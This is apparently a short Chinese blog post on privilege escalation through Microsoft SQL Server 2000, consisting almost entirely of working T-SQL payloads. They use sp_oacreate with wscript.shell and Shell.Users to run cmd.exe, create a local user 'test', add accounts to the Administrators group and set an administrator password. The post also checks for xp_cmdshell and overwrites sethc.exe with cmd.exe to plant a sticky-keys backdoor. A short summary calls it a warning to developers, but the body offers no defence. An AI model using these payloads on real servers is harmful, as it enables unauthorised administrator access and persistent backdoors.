sql 2000 提权经测试

最新推荐文章于 2025-08-19 15:12:31 发布

原创最新推荐文章于 2025-08-19 15:12:31 发布 · 1.3k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#sql #shell #windows #system #null #output

sql server 专栏收录该内容

3 篇文章

订阅专栏

本文通过具体的SQL语句展示了潜在的SQL注入攻击方式。包括利用存储过程创建和操作Windows用户账号、更改密码等敏感操作。提醒开发者注意防范此类安全风险。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >


declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators IUSR_InterNet /add'


select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回1正版拓展存在



DECLARE @o int
DECLARE @z int

EXEC sp_OACreate 'Shell.Users',@o OUT
EXEC sp_OAMethod @o, 'Create', @z OUT, 'test'
EXEC sp_OASetProperty   @z, 'setting', 3 , 'AccountType'
EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''


rundll32 netplwiz.dll,UsersRunDll

lusrmgr.msc


declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\system32\cmd.exe' ,'c:\windows\system32\sethc.exe';